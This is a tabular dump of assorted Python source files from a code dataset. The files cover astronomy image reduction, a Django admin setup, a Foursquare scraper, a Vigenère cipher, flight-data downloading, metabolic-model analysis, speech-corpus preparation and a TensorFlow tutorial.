id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
5050979 | import matplotlib
matplotlib.use("Agg")
from astropy.io import fits as pyfits
import numpy as np
import scipy
from scipy import optimize
import copy
import glob
import os
import matplotlib.pyplot as plt
import sys
sys.path.append("../utils/GLOBALutils")
import GLOBALutils
import pycurl
def MedianCombine(ImgList,ZF=0.):
"""
Median combine a list of images
"""
n = len(ImgList)
if n==0:
raise ValueError("empty list provided!")
h = pyfits.open(ImgList[0])[0]
d = h.data
d = OverscanTrim(d) - ZF
factor = 1.25
if (n < 3):
factor = 1
ronoise = factor * h.header['HIERARCH ESO CORA CCD RON'] / np.sqrt(n)
gain = h.header['HIERARCH ESO CORA CCD GAIN']
if (n == 1):
return d, ronoise, gain
else:
for i in range(n-1):
h = pyfits.open(ImgList[i+1])[0]
d = np.dstack((d,OverscanTrim(h.data)-ZF))
return np.median(d,axis=2), ronoise, gain
def OverscanTrim(d):
"""
Overscan correct and Trim a refurbished CORALIE image
"""
# bias has no significant structure, so a single median suffices, I think
# overscan = [0:49] [2097:2145]
overscan = 0.5*(np.median(d[:,0:49]) + np.median(d[:,2097:2146]))
newdata = d[:,50:2097] - overscan
return newdata
def getObName(h):
"""
Get name of object under consideration
"""
obname = h[0].header['HIERARCH ESO OBS REFNOCOD'].upper().replace(' ','')
observer = h[0].header['OBSERVER']
if (obname == 'H726273'):
obname = 'HD72673'
if (obname == 'HAT'):
obname = 'HATS563-036'
if (obname == '9999.999'):
# try the header that James usually uses:
obname = h[0].header['HIERARCH ESO OBS TARG CODE'].upper().replace(' ','')
if (obname == '9999.999'):
# seems like observer was too lazy to type name, so use SIMBAD
(th,tfile) = tempfile.mkstemp(prefix='CP', text=True)
tf = open(tfile,'w')
tf.write("output console=off\n")
tf.write("output script=off\n")
tf.write("output error=merge\n")
tf.write("set limit 1\n")
tf.write("format object fmt1 \"%IDLIST(HD|HIP|1) | %OTYPELIST(S) | %SP(S)\"\n")
tf.write("result full\n")
tf.write("query sample region(circle, %s %s,5s) & otype='Star'\n" % (h[0].header['HIERARCH ESO TEL TARG ALPHA'],h[0].header['HIERARCH ESO TEL TARG DELTA'] ))
#tf.write("set radius 5s\n")
tf.close()
values = [
("scriptFIle", (pycurl.FORM_FILE, tfile))
]
output = StringIO.StringIO()
c = pycurl.Curl()
c.setopt(pycurl.URL, "http://simbad.harvard.edu/simbad/sim-script")
c.setopt(c.HTTPPOST, values)
c.setopt(pycurl.WRITEFUNCTION, output.write)
c.perform()
c.close()
result = output.getvalue()
lines = result.split('\n')
result = lines[len(lines)-3]
if (result.count('No') > 0):
# build alternate obname based on ra-dec
ra_s = h[0].header['HIERARCH ESO OBS ALPHACAT'].replace('h','').replace('m','')
dec_s = h[0].header['HIERARCH ESO OBS DELTACAT'].replace(':','')
hour_l = len( h[0].header['HIERARCH ESO OBS ALPHACAT'].split('h')[0] )
if (hour_l == 1):
obname = 'J_0'+ra_s+dec_s
elif (hour_l == 2):
obname = 'J_'+ra_s+dec_s
else:
raise ValueError("Unexpected length for RA string from header")
else:
obname = lines[len(lines)-3].split('|')[0].replace(" ","")
os.remove(tfile)
return obname
def FileClassify(dir, log):
"""
Classifies all files in a directory and writes a night log of science images
"""
# define output lists
simThAr_sci = []
simFP_sci = []
biases = []
ob_flats = []
co_flats = []
ob_loc = []
co_loc = []
ThAr_ref = []
FP_ref = []
ThAr_ref_dates = []
ThFP_ref_dates = []
obnames = []
obnames_FP = []
exptimes = []
exptimes_FP = []
flats = []
f = open(log,'w')
bad_files = []
if os.access(dir+'bad_files.txt',os.F_OK):
bf = open(dir+'bad_files.txt')
linesbf = bf.readlines()
for line in linesbf:
bad_files.append(dir+line[:-1])
bf.close()
all_files = glob.glob(dir+"/CORALIE*fits")
for archivo in all_files:
dump = False
for bf in bad_files:
if archivo == bf:
dump = True
break
if dump == False:
h = pyfits.open(archivo)
hd = pyfits.getheader(archivo)
if h[0].header['HIERARCH ESO TPL TYPE'] == 'OBTH' or h[0].header['HIERARCH ESO TPL TYPE'] == 'OBFP':
obname = getObName(h)
ra = h[0].header['HIERARCH ESO OBS ALPHACAT']
delta = h[0].header['HIERARCH ESO OBS DELTACAT']
airmass= h[0].header['HIERARCH ESO OBS TARG AIRMASS']
texp = h[0].header['HIERARCH ESO OBS TEXP']
date = h[0].header['HIERARCH ESO CORA SHUTTER START DATE']
hour = h[0].header['HIERARCH ESO CORA SHUTTER START HOUR']
line = "%-15s %10s %10s %8.2f %4.2f %8s %7.4f %s\n" % (obname, ra, delta, texp, airmass, date, hour, archivo)
f.write(line)
simThAr_sci.append(archivo)
obnames.append( obname )
exptimes.append( texp )
elif h[0].header['HIERARCH ESO TPL TYPE'] == 'BIAS':
biases.append(archivo)
elif h[0].header['HIERARCH ESO TPL TYPE'] == 'FFO':
ob_flats.append(archivo)
elif h[0].header['HIERARCH ESO TPL TYPE'] == 'FFC':
co_flats.append(archivo)
elif h[0].header['HIERARCH ESO TPL TYPE'] == 'FF2':
flats.append(archivo)
elif h[0].header['HIERARCH ESO TPL TYPE'] == 'LOCO':
ob_loc.append(archivo)
elif h[0].header['HIERARCH ESO TPL TYPE'] == 'LOCC':
co_loc.append(archivo)
elif h[0].header['HIERARCH ESO TPL TYPE'] == 'THA2':
ThAr_ref.append(archivo)
mjd, mjd0 = mjd_fromheader(h)
ThAr_ref_dates.append( mjd )
elif h[0].header['HIERARCH ESO TPL TYPE'] == 'THFP':
FP_ref.append(archivo)
mjd, mjd0 = mjd_fromheader(h)
ThFP_ref_dates.append( mjd )
f.close()
return biases, ob_flats, co_flats, ob_loc, co_loc, ThAr_ref, FP_ref, simThAr_sci, simFP_sci, ThAr_ref_dates, ThFP_ref_dates, obnames, obnames_FP, exptimes, exptimes_FP,flats
def mjd_fromheader(h):
"""
return modified Julian date from header
"""
datetu = h[0].header['HIERARCH ESO CORA SHUTTER START DATE']
ut = h[0].header['HIERARCH ESO CORA SHUTTER START HOUR']
mjd0,mjd,i = GLOBALutils.iau_cal2jd(int(datetu[0:4]),int(datetu[4:6]),int(datetu[6:8]))
mjd_start = mjd + ut/24.0
secinday = 24*3600.0
fraction = h[0].header['HIERARCH ESO CORA PM FLUX TMMEAN']
texp = h[0].header['HIERARCH ESO OBS TEXP'] #sec
mjd = mjd_start + (fraction * texp) / secinday
return mjd, mjd0
def XC_Final_Fit_Rot( X, Y, ldc = 0.8, vsini = 10.0 ):
"""
Fits a Gaussian and Gauss-Hermite series
Higher order in the expansion is horder
"""
f0 = 0.1
vel0 = X[len(X)/2]
def conv(x,g,x1,r1):
xi = np.argmin(x1**2)
r1 = np.hstack((r1[xi:],r1[:xi]))
tg = np.zeros(len(g))
for i in range(len(x)):
tg[i] = np.add.reduce(g*r1)*(x[1]-x[0])
r1 = np.hstack((r1[-1:],r1[:-1]))
return tg
def fitfunc(p,x,e):
A = p[0]
rv = p[1]
vrot = p[2]
s = p[3]
g1 = np.exp(-0.5*((x-rv)/s)**2)/np.sqrt(2*np.pi*s*s)
d = x[1]-x[0]
x1 = np.arange(len(x))*d
x1 -= int(np.round(x1.mean()))
I = np.where(x1**2 < vrot**2)[0]
c1 = 2.*(1. - e) / (np.pi * vrot * (1. - e/3.))
c2 = .5 * e / (vrot * (1.-e/3.))
r1 = np.zeros(len(x1))
r1[I] = (c1*np.sqrt(1.-(x1[I]/vrot)**2) + c2*(1. - (x1[I]/vrot)**2))
prof = conv(x,g1,x1,r1)
ret = 1. - A*prof
return ret
def errfunc(p, x, y, ldc):
clutch = 0.0
mean = p[1]
if (mean < np.min(x)):
clutch = 1e10*(1.0 - np.exp(-np.abs(mean-np.min(x)) / 3) )
if (mean > np.max(x)):
clutch = 1e10*(1.0 - np.exp(-np.abs(mean-np.max(x)) / 3) )
return np.ravel( (fitfunc(p,x,ldc) - y) ) + clutch
p0 = np.array( [1.,vel0,vsini,1.] )
p1, success = scipy.optimize.leastsq(errfunc,p0, args=(X,Y,ldc))
#plt.plot(X,Y)
#plt.plot(X, 1. - p1[0]*np.exp(-0.5*((X-p1[1])/p1[3])**2)/np.sqrt(2*np.pi*p1[3]*p1[3]))
c1 = 2.*(1. - ldc) / (np.pi * p1[2] * (1. - ldc/3.))
c2 = .5 * ldc / (p1[2] * (1.-ldc/3.))
I = np.where(X**2 < p1[2]**2)[0]
r1 = np.zeros(len(X))
r1[I] = (c1*np.sqrt(1.-(X[I]/p1[2])**2) + c2*(1. - (X[I]/p1[2])**2))
#plt.plot(X, 1. - p1[0]*r1)
#plt.show()
return p1, fitfunc(p1,X,ldc)
def get_ldc(T,G,Z,M,ldfile = 'lin_coe_sloan2.dat'):
f = np.loadtxt(ldfile)
I = np.argmin( np.sqrt((T - f[:,2])**2)/T + np.sqrt((G - f[:,1])**2)/G + np.sqrt((Z - f[:,3])**2)/np.sqrt(Z**2) )
return f[I][5]
| StarcoderdataPython |
6529516 | <reponame>kyzima-spb/django-adminlte-full
from django.contrib import admin
from . import models
admin.site.register(models.MenuModel)
admin.site.register(models.MenuItemModel)
| StarcoderdataPython |
181774 | <reponame>eugenejen/hr-py-boilerplate
"""
test runner
"""
from hr_problem.main import main
def test_main():
""" test """
input_data = ''
output_data = main(input_data)
expected_data = ''
assert expected_data == output_data
| StarcoderdataPython |
4978810 | <reponame>edupyter/EDUPYTER38<filename>Lib/site-packages/ipykernel/log.py
import warnings
from zmq.log.handlers import PUBHandler
warnings.warn(
"ipykernel.log is deprecated. It has moved to ipyparallel.engine.log",
DeprecationWarning,
stacklevel=2,
)
class EnginePUBHandler(PUBHandler):
"""A simple PUBHandler subclass that sets root_topic"""
engine = None
def __init__(self, engine, *args, **kwargs):
PUBHandler.__init__(self, *args, **kwargs)
self.engine = engine
@property # type:ignore[misc]
def root_topic(self):
"""this is a property, in case the handler is created
before the engine gets registered with an id"""
if isinstance(getattr(self.engine, "id", None), int):
return "engine.%i" % self.engine.id # type:ignore[union-attr]
else:
return "engine"
| StarcoderdataPython |
11282336 | class CryptoStats:
"""POJO which contains trading stats for a currency pair"""
def __init__ (self, open: float = 0.0, high: float = 0.0, low: float = 0.0, volume: float = 0.0, last: float = 0.0, volume30d: float = 0.0):
self.open = open
self.high = high
self.low = low
self.volume = volume
self.last = last
self.volume30d = volume30d | StarcoderdataPython |
12844115 | import requests
from bs4 import BeautifulSoup
import simplejson as json
import config
import pymysql
global database_conn
global database_cursor
database_conn = pymysql.connect(host = config.db_host, user = config.db_user, passwd = config.db_pass, db = config.db_database, use_unicode=True, charset="utf8")
database_cursor = database_conn.cursor()
param = {
'client_id': config.client_id,
'client_secret': config.client_secret,
'oauth_token': config.access_token,
'limit': '250',
'v': '20170625'
}
sql = "select distinct uid from user;"
database_cursor.execute(sql)
results = database_cursor.fetchall()
uids = [uid[0] for uid in results]
sql = "select distinct rid from restaurant;"
database_cursor.execute(sql)
results = database_cursor.fetchall()
rids = [rid[0] for rid in results]
for uid in uids:
offset = 0
count = -1
while count == -1 or count == 250:
checkin_record = []
param_str = '&'.join(['='.join(i) for i in param.items()])
req = requests.get('https://api.foursquare.com/v2/users/' + str(uid) + '/checkins?' + param_str + '&offset=' + str(offset))
soup = BeautifulSoup(req.content, 'html.parser')
try:
jdata = json.loads(str(soup))
except:
print('Error!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
continue
count = jdata['response']['checkins']['count']
print(count)
if count != 0:
for i in jdata['response']['checkins']['items']:
rid = i['venue']['id']
checkin_record.append((uid, rid))
lineCheckin = 'insert into checkin (uid, rid) values ' + str(checkin_record)[1:-1] + ';'
print(lineCheckin)
database_cursor.execute(lineCheckin)
database_conn.commit()
database_conn.close() | StarcoderdataPython |
8177213 | <filename>tests/io/complex/__init__.py
from .. import unittest
| StarcoderdataPython |
11339919 | from os import environ
from sys import stdin, stdout
from math import gcd
class Vigenere:
def encrypt(self, txt, key):
mod = 26
txt = txt.replace(" ", "")
txt = txt.upper()
n = len(txt)
key_complete = ""
m = len(key)
for i in range(n):
key_complete += key[(i % m)]
output = ""
for i in range(n):
ord1 = ord(key_complete[i]) - ord('A')
ord2 = ord(txt[i]) - ord('A')
output += chr( ((ord1+ord2) % mod) + ord('A') )
return output
def decrypt(self, encry, key):
mod = 26
n = len(encry)
key_complete = ""
m = len(key)
for i in range(n):
key_complete += key[(i % m)]
output = ""
for i in range(n):
ord1 = ord(key_complete[i]) - ord('A')
ord2 = ord(encry[i]) - ord('A')
output += chr( ((ord2-ord1) % mod) + ord('A') )
return output
if __name__ == '__main__':
algo = Vigenere()
txt = "EL CURSo DE CRIPTOGRAFIA ME ENCANTA"
key = "UNAL"
encrypt = algo.encrypt(txt, key)
print("Encrypt:", encrypt)
decrypt = algo.decrypt(encrypt, key)
print("Decrypt", decrypt)
| StarcoderdataPython |
242829 | # Author: <NAME>
# On-Time Performance Data downloader
# Data taken from https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236
# Field descriptions provided https://www.transtats.bts.gov/Fields.asp?Table_ID=236
"""This script downloads weather data from for Ohare Airport from the US Bureau of Transportation
Usage: python download_otp.py
"""
import requests
from selenium import webdriver
import pandas as pd
import numpy as np
import zipfile as zp
from bs4 import BeautifulSoup
import time
import glob
import os
import shutil
def download_otp(url, start_year, end_year):
# path_parent = os.path.dirname(os.getcwd())
# download_path = os.chdir(path_parent)
# Instantiate browser
chrome_options = webdriver.ChromeOptions()
prefs = {'download.default_directory' : os.getcwd()+'/data/otp'}
chrome_options.add_experimental_option('prefs', prefs)
driver = webdriver.Chrome(chrome_options=chrome_options)
driver.get(url)
#STEP 1. LOCATE DOWNLOAD BUTTON
download_bt = driver.find_element_by_xpath('//*[@id="content"]/table[1]/tbody/tr/td[2]/table[3]/tbody/tr/td[2]/button[1]')
#STEP 2. SELECT FIELDS OF INTEREST (IGNORING DEFAULTS)
#DAY_OF_WEEK
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[7]/td[1]/input').click()
#FLIGHT_DATE
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[8]/td[1]/input').click()
#OP_UNIQUE_CARRIER
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[10]/td[1]/input').click()
#TAIL_NUM
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[13]/td[1]/input').click()
#FLIGHT_NUM
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[14]/td[1]/input').click()
#ORIGIN
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[19]/td[1]/input').click()
#DEST
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[29]/td[1]/input').click()
#ARR_TIME
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[49]/td[1]/input').click()
#ARR_DELAY
driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[50]/td[1]/input').click()
#STEP 3. LOOP OVER YEARS OF INTEREST
#FIND DROPDOWN FOR SELECTABLE YEARS
year_sel = driver.find_element_by_id("XYEAR")
all_years = year_sel.find_elements_by_tag_name("option")
targ_years= list(range(start_year,end_year+1,1))
month_sel = driver.find_element_by_id("FREQUENCY")
all_months = month_sel.find_elements_by_tag_name("option")
#OUTER LOOP FOR EACH YEAR
for year in all_years:
if int(year.get_attribute("value")) in targ_years:
print(year.get_attribute("value"))
year.click()
for month in all_months:
month.click()
print(month.get_attribute("value"))
#EXECUTE DOWNLOAD
download_bt.click()
time.sleep(15)
def aggregate_data(path):
"""
Reads in data from downloaded zip files and writes a single aggregated csv file for ORD
"""
entries = []
zip_files = glob.glob(path+'/*.zip')
for zip_filename in zip_files:
with zp.ZipFile(zip_filename, "r") as myzip:
dir_name = os.path.splitext(zip_filename)[0]
os.mkdir(dir_name)
zip_handler = zp.ZipFile(zip_filename, "r")
zip_handler.extractall(dir_name)
# path = dir_name
csv_file = glob.glob(path+'/*/*.csv')
entries.append(pd.read_csv(csv_file[0]).query('DEST == "ORD"'))
shutil.rmtree(dir_name, ignore_errors=False, onerror=None)
combined_csvs = pd.concat(entries)
combined_csvs.to_csv('data/ORD_OTP.csv')
def main():
# # Set month and year parameters
# Months = list(range(1,13,1))
# Months = list(map(str,Months))
# targ_years= list(range(2013,2020,1))
# targ_years = list(map(str,targ_years))
TARGET = 'https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236'
download_otp(TARGET, 2013, 2020)
aggregate_data('data/otp')
# script entry point
if __name__ == '__main__':
main() | StarcoderdataPython |
344747 | <filename>python/analysis_toolbox.py<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
from optknock import OptKnock
################################################################################
# HTML output tools #
################################################################################
def model_summary(model, solution, html):
reaction2flux_dict = dict([(model.reactions[i], solution.x[i])
for i in xrange(len(model.reactions))])
display_exchange_reactions(model, reaction2flux_dict, html)
for m in model.metabolites:
display_metabolite_reactions(model, m, reaction2flux_dict, html)
def display_exchange_reactions(model, reaction2flux_dict, html):
# metabolite
html.write('<br />\n')
html.write('<a name="EXCHANGE"></a>\n')
html.write('Exchange reactions: <br />\n')
html.write('<br />\n')
titles = ['Sub System', 'Reaction Name', 'Reaction ID',
'Reaction', 'LB', 'UB', 'Reaction Flux']
# fluxes
rowdicts = []
for r in model.reactions:
if r.subsystem not in ['', 'Exchange']:
continue
if abs(reaction2flux_dict[r]) < 1e-10:
continue
direction = np.sign(reaction2flux_dict[r])
d = {'Sub System': 'Exchange', 'Reaction Name': r.name,
'Reaction ID': r.id,
'Reaction': display_reaction(r, None, direction),
'LB': '%g' % r.lower_bound,
'UB': '%g' % r.upper_bound,
'Reaction Flux': '%.2g' % abs(reaction2flux_dict[r]),
'sortkey': reaction2flux_dict[r]}
rowdicts.append(d)
# add a zero row (separating forward and backward) and sort the
# rows according to the net flux
rowdicts.append({'sortkey': 0})
rowdicts.sort(key=lambda x: x['sortkey'])
# add color to the rows
max_flux = max([abs(d['sortkey']) for d in rowdicts])
rowcolors = [color_gradient(d['sortkey']/max_flux) for d in rowdicts]
html.write_table(rowdicts, titles, rowcolors=rowcolors)
def display_metabolite_reactions(model, m, reaction2flux_dict, html):
# metabolite
html.write('<br />\n')
html.write('<a name="%s"></a>\n' % m.id)
html.write('Metabolite name: ' + m.name + '<br />\n')
html.write('Metabolite ID: ' + m.id + '<br />\n')
html.write('Compartment: ' + m.compartment + '<br />\n')
html.write('<br />\n')
titles = ['Sub System', 'Reaction Name', 'Reaction ID',
'Reaction', 'LB', 'UB', 'Reaction Flux', 'Net Flux']
# fluxes
rowdicts = []
for r in m.get_reaction():
if abs(reaction2flux_dict[r]) < 1e-10:
continue
direction = np.sign(reaction2flux_dict[r])
net_flux = reaction2flux_dict[r] * r.get_coefficient(m)
d = {'Sub System': r.subsystem, 'Reaction Name': r.name,
'Reaction ID': r.id,
'Reaction': display_reaction(r, m, direction),
'LB': '%g' % r.lower_bound,
'UB': '%g' % r.upper_bound,
'Reaction Flux': '%.2g' % abs(reaction2flux_dict[r]),
'Net Flux': '%.2g' % net_flux,
'sortkey': -net_flux}
rowdicts.append(d)
if rowdicts == []:
return
# add a zero row (separating forward and backward) and sort the
# rows according to the net flux
rowdicts.append({'sortkey': 0})
rowdicts.sort(key=lambda x: x['sortkey'])
# add color to the rows
max_flux = max([abs(d['sortkey']) for d in rowdicts])
rowcolors = [color_gradient(d['sortkey']/max_flux) for d in rowdicts]
html.write_table(rowdicts, titles, rowcolors=rowcolors)
def display_reaction(r, m_bold=None, direction=1):
"""
Returns a string representation of a reaction and highlights the
metabolite 'm' using HTML tags.
"""
s_left = []
s_right = []
for m in r.get_reactants() + r.get_products():
if m == m_bold:
s_met = "<a href='#%s'><b>%s</b></a>" % (m.id, m.id)
else:
s_met = "<a href='#%s'>%s</a>" % (m.id, m.id)
coeff = r.get_coefficient(m)
if abs(coeff) == 1:
s_coeff = ""
else:
s_coeff = "%g " % abs(coeff)
if coeff < 0:
s_left += [s_coeff + s_met]
else:
s_right += [s_coeff + s_met]
if direction == 1:
return ' + '.join(s_left) + ' ⇋ ' + ' + '.join(s_right)
else:
return ' + '.join(s_right) + ' ⇋ ' + ' + '.join(s_left)
def color_gradient(x):
"""
Returns a color in Hex-RGB format between white and red if x is positive
or between white and green if x is negative
"""
grad = 220 - abs(x)*80
if x > 0:
return '%.2x%.2x%.2x' % (255, grad, grad)
elif x < 0:
return '%.2x%.2x%.2x' % (grad, 255, grad)
else:
return '%.2x%.2x%.2x' % (100, 100, 100)
################################################################################
# plotting tools #
################################################################################
def plot_phase(model, pivot_reaction_id):
ok = OptKnock(model)
r_pivot = ok.get_reaction_by_id(pivot_reaction_id)
ok.prepare_FBA_primal()
data = []
for f in np.arange(0, 100, 1):
ok.var_v[r_pivot].lowBound = f
ok.var_v[r_pivot].upBound = f
ok.solve()
obj = ok.get_objective_value() or 0
data.append((f, obj))
print "RBC = %.3g, BM = %.3g" % (f, obj)
data = np.matrix(data)
fig = plt.figure()
plt.plot(data[:,1], data[:,0], '-', figure=fig)
return fig
def get_PPP(model, reaction_id):
ok = OptKnock(model)
PPP_data = ok.get_PPP_data(reaction_id)
if PPP_data is None:
print 'model is infeasible'
PPP_data = np.matrix([[0, 0, 0.05], [0.05, 0, 0]])
slope = None
else:
# calculate the "slope" - i.e. close to 0 biomass production, what is the
# minimal flux in the target reaction that is required?
slope = PPP_data[1, 1] / PPP_data[1, 0]
print slope
return PPP_data, slope
def plot_multi_PPP(model_dict, reaction_id, ax):
"""
Draw a comparative Phenotypic Phase Plane plot.
Arguments:
models - a list of cobrapy Model objects
labels - a list of strings for use as the legend
"""
colors = ['red', 'blue', 'green', 'magenta', 'orange', 'cyan']
PPP_data_dict = {}
for label, model in model_dict.iteritems():
# verify that this model has the pivot reaction:
if reaction_id not in model.reactions:
print 'model "%s" does not contain the reaction "%s"' % (label, reaction_id)
continue
PPP_data = OptKnock(model).get_PPP_data(reaction_id)
# verify that this model is feasible (i.e. biomass yield is more than minimal threshold):
if PPP_data is None:
print 'model "%s" is infeasible' % label
continue
PPP_data_dict[label] = PPP_data
for i, (label, PPP_data) in enumerate(PPP_data_dict.iteritems()):
if label == 'wild-type':
ax.fill_between(PPP_data[:,0].flat, PPP_data[:,1].flat, PPP_data[:,2].flat,
facecolor='grey', alpha=0.1, linewidth=0)
else:
ax.fill_between(PPP_data[:,0].flat, PPP_data[:,1].flat, PPP_data[:,2].flat,
facecolor=colors[i], alpha=0.1, linewidth=0)
ax.set_xlabel(r'Biomass production [h$^{-1}$]')
ax.set_ylabel(r'%s flux [mmol g(DW)$^{-1}$ h$^{-1}$]' % reaction_id)
ax.set_xlim(0, None)
ax.set_ylim(0, None)
ax.grid()
for i, (label, PPP_data) in enumerate(PPP_data_dict.iteritems()):
if label == 'wild-type':
ax.plot(PPP_data[:,0].flat, PPP_data[:,1].flat, lw=0, label=label)
else:
ax.plot(PPP_data[:,0].flat, PPP_data[:,1].flat, color=colors[i], lw=1, label=label)
leg = ax.legend(loc='upper right', fancybox=True)
leg.get_frame().set_alpha(0.7)
for i, (label, PPP_data) in enumerate(PPP_data_dict.iteritems()):
if label == 'wild-type':
ax.plot(PPP_data[:,0].flat, PPP_data[:,2].flat, lw=0, label=label)
else:
ax.plot(PPP_data[:,0].flat, PPP_data[:,2].flat, color=colors[i], lw=1, label=label)
| StarcoderdataPython |
66156 | """
Description taken from official website: https://datasets.kensho.com/datasets/spgispeech
SPGISpeech consists of 5,000 hours of recorded company earnings calls and their respective
transcriptions. The original calls were split into slices ranging from 5 to 15 seconds in
length to allow easy training for speech recognition systems. Calls represent a broad
cross-section of international business English; SPGISpeech contains approximately 50,000
speakers, one of the largest numbers of any speech corpus, and offers a variety of L1 and
L2 English accents. The format of each WAV file is single channel, 16kHz, 16 bit audio.
Transcription text represents the output of several stages of manual post-processing.
As such, the text contains polished English orthography following a detailed style guide,
including proper casing, punctuation, and denormalized non-standard words such as numbers
and acronyms, making SPGISpeech suited for training fully formatted end-to-end models.
Official reference:
<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., Balam,
J., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>.
(2021). SPGISpeech: 5, 000 hours of transcribed financial audio for fully formatted
end-to-end speech recognition. ArXiv, abs/2104.02014.
ArXiv link: https://arxiv.org/abs/2104.02014
"""
import logging
import string
from pathlib import Path
from typing import Dict, Union
from tqdm.auto import tqdm
from lhotse.audio import Recording, RecordingSet
from lhotse.parallel import parallel_map
from lhotse.recipes.utils import manifests_exist, read_manifests_if_cached
from lhotse.supervision import SupervisionSet, SupervisionSegment
from lhotse.utils import Pathlike, Seconds
def download_spgispeech(
target_dir: Pathlike = ".",
) -> None:
"""
Download and untar the dataset.
NOTE: This function just returns with a message since SPGISpeech is not available
for direct download.
:param target_dir: Pathlike, the path of the dir to storage the dataset.
"""
logging.info(
"SPGISpeech is not available for direct download. Please fill out the form at"
" https://datasets.kensho.com/datasets/spgispeech to download the corpus."
)
def normalize(text: str) -> str:
# Remove all punctuation
text = text.translate(str.maketrans("", "", string.punctuation))
# Convert all upper case to lower case
text = text.lower()
return text
def prepare_spgispeech(
corpus_dir: Pathlike,
output_dir: Pathlike,
normalize_text: bool = True,
num_jobs: int = 1,
) -> Dict[str, Dict[str, Union[RecordingSet, SupervisionSet]]]:
"""
Returns the manifests which consist of the Recordings and Supervisions.
When all the manifests are available in the ``output_dir``, it will simply read and return them.
:param corpus_dir: Pathlike, the path of the data dir.
:param output_dir: Pathlike, the path where to write the manifests.
:param normalize_text: Bool, if True, normalize the text (similar to ESPNet recipe).
:param num_jobs: int, the number of jobs to use for parallel processing.
:return: a Dict whose key is the dataset part, and the value is Dicts with the keys 'audio' and 'supervisions'.
.. note::
Unlike other recipes, output_dir is not Optional here because we write the manifests
to the output directory while processing to avoid OOM issues, since it is a large dataset.
.. caution::
The `normalize_text` option removes all punctuation and converts all upper case to lower case.
This includes removing possibly important punctuations such as dashes and apostrophes.
"""
corpus_dir = Path(corpus_dir)
assert corpus_dir.is_dir(), f"No such directory: {corpus_dir}"
audio_dir = (
corpus_dir if (corpus_dir / "train").is_dir() else corpus_dir / "spgispeech"
)
dataset_parts = ["train", "val"]
manifests = {}
output_dir = Path(output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
# Maybe the manifests already exist: we can read them and save a bit of preparation time.
manifests = read_manifests_if_cached(
dataset_parts=dataset_parts,
output_dir=output_dir,
prefix="spgispeech",
suffix="jsonl.gz",
lazy=True,
)
for part in dataset_parts:
logging.info(f"Processing SPGISpeech subset: {part}")
if manifests_exist(
part=part, output_dir=output_dir, prefix="spgispeech", suffix="jsonl.gz"
):
logging.info(f"SPGISpeech subset: {part} already prepared - skipping.")
continue
# Read the recordings and write them into manifest. We additionally store the
# duration of the recordings in a dict which will be used later to create the
# supervisions.
global audio_read_worker
durations = {}
def audio_read_worker(p: Path) -> Recording:
r = Recording.from_file(p, recording_id=f"{p.parent.stem}_{p.stem}")
durations[r.id] = r.duration
return r
with RecordingSet.open_writer(
output_dir / f"spgispeech_recordings_{part}.jsonl.gz"
) as rec_writer:
for recording in tqdm(
parallel_map(
audio_read_worker,
(audio_dir / part).rglob("*.wav"),
num_jobs=num_jobs,
),
desc="Processing SPGISpeech recordings",
):
rec_writer.write(recording)
# Read supervisions and write them to manifest
with SupervisionSet.open_writer(
output_dir / f"spgispeech_supervisions_{part}.jsonl.gz"
) as sup_writer, open(corpus_dir / f"{part}.csv", "r") as f:
# Skip the header
next(f)
for line in tqdm(f, desc="Processing utterances"):
parts = line.strip().split("|")
# 07a785e9237c389c1354bb60abca42d5/1.wav -> 07a785e9237c389c1354bb60abca42d5_1
recording_id = parts[0].replace("/", "_").replace(".wav", "")
text = parts[2]
if normalize_text:
text = normalize(text)
spkid = recording_id.split("_")[0]
segment = SupervisionSegment(
id=recording_id,
recording_id=recording_id,
text=text,
speaker=spkid,
start=0,
duration=durations[recording_id],
language="English",
)
sup_writer.write(segment)
manifests[part] = {
"recordings": RecordingSet.from_jsonl_lazy(rec_writer.path),
"supervisions": SupervisionSet.from_jsonl_lazy(sup_writer.path),
}
return manifests
| StarcoderdataPython |
389989 | # TensorFlow and tf.keras
import tensorflow as tf
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image, ImageOps
fashion_mnist = tf.keras.datasets.fashion_mnist
(train_images, train_labels), (test_images,
test_labels) = fashion_mnist.load_data()
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
# print(train_images.shape)
# print(len(train_labels))
# print(train_labels)
# print(test_images.shape)
# print(len(test_labels))
# plt.figure()
# plt.imshow(train_images[0])
# plt.colorbar()
# plt.grid(False)
# plt.savefig("preprocess.png")
train_images = train_images / 255.0
test_images = test_images / 255.0
#plt.figure(figsize=(10, 10))
# for i in range(25):
# plt.subplot(5, 5, i+1)
# plt.xticks([])
# plt.yticks([])
# plt.grid(False)
# plt.imshow(train_images[i], cmap=plt.cm.binary)
# plt.xlabel(class_names[train_labels[i]])
# plt.savefig("25.png")
# Set up the model
model = tf.keras.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10)
])
# Compile the model
model.compile(optimizer='adam',
